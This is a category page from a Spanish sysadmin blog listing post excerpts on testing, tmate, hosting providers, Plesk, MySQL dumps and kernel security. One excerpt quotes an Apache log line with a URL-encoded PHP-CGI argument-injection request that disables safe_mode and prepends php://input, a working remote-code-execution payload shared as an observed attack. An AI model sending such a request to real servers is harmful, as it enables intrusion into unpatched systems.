senin.org

Categoría: Artículos

  • Avoid Testing Implementation Details, Test Behaviours / Evita testear detalles de implementación, testea comportamiento

    Traducción del texto original de Ian Cooper el 6 de Octubre de 2011 en http://codebetter.com/iancooper/2011/10/06/avoid-testing-implementation-details-test-behaviours/ De vez en cuando vuelvo a leer el libro Test-Driven Development de Kent Beck. Sinceramente, creo que es uno de los mejores libros de desarrollo de software jamás escritos. Lo que me encanta del libro es su sencillez. Tiene una…

  • recuperar sesión de tmate

    Tmate, Instant terminal sharing ( https://tmate.io/ ) es un multiplexador de terminales basdo en tmux (https://github.com/tmux/tmux/wiki) . Así a lo tosco, te permite compartir una o varias sesiones de terminal en la misma conexión. Es una de las herramientas que más intensamente uso para trabajar en equipo de manera remota. Tiene algunas complicaciones como atajos…

  • cosas de logs

    Queremos compartir cosas curiosas que vemos en los logs. En este caso es un fragmento en un log de apache de un servidor : 101.78.160.195 – – [03/Nov/2013:23:21:42 +0100] «POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1» 400 498 «-» «Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25» 101.78.160.195 – – [03/Nov/2013:23:21:43 +0100]…

  • Por qué no elegir Siliconhosting , Axarnet ni Dinahosting

    Después de muchos meses pensando en escribir o no escribir este tipo de comentarios totalmente subjetivos he decidido escribirlo, aunque sea brevemente esperando que sirva de algo, por lo menos de cara a futuros clientes o bien para que mejoren los servicios. Las experiencias que describo se basan en aproximadamente dos años de servicio con Siliconhosting…

  • VPS Plesk no ejecuta cron.daily

    En un par de máquinas VPS Plesk 10.4.4 que tenemos con Axarnet no funciona cron correctamente. El caso es que todo parece estar correcto, los ficheros del cron, permsisos, los logs no reflejan nada… Nos pusimos a revisar ficheros y llegamos a este punto /etc/crontab. En crontab se definen las horas a las que se…

  • Separar un fichero SQL con mysqldump en tablas individuales

    En el siguiente caso tenemos un volcado enormemente grande de una tienda ( ElasticPath ) que almacena una cantidad brutal de datos de logs, sesiones y carritos. Importar una base de datos de unos 2 o 3 Gb nos puede llevar un buen rato, y nosotros sólo queremos algunas tablas… así que hemos decidido separar…

  • Debian : ficheros temporales mejor en RAM o en disco ?

    En este link podeis leer un interesante artículo resumiendo el hilo de debate que comenzó Sergue acerca de si es buena idea meter el directorio /tmp ( directorio para albergar los ficheros temporales en un sistema Unix/Linux ) en memoria. Para la nueva versión de Debian: Wheezy 7.0 se está valorando si sería recomendable montar…

  • Usando Horde con safe_mode para enviar por smtp y no usar sendmail

    Seguramente esté muy documentado ya por ahí pero es muy recomendable dejar de usar horde bajo sendmail con el fin de securizar la máquina. Con el cambio que comentamos a continuación, evitamos tener que ejecutar comandos en la máquina local, ya que el correo lo enviamos vía smtp al servidor local o a cualquier otro…

  • Vulnerabilidad CRÍTICA en la API de Plesk

    Hace unas semanas se notificó por parte de Parallels un fallo crítico en el su software de panel de control de hosting: Plesk. Hicimos referencia a la nota en nuestro blog http://hostingaldescubierto.com/wordpress/2012/02/10/plesk-fallo-critico-de-seguridad-sql-injection/ Reciemiente hemos tenido accesos a una máquina usando este fallo de seguridad y vamos a compartir con vosotros algunas observaciones de estos accesos:…

  • [xploit] Grave fallo de seguridad en el kernel 2.6

    Aunque llegamos tarde para anunciar la noticia, es necesario comentar aquí la necesidad de aplicar los parches que salieron hace dos días 21 de Septiembre que corrijen un grabe fallo de seguridad en los kernels 2.6 bajo máquinas con arquitectura x86_64. El fallo se puede explotar localmente en la máquina y consiste en acceder vía …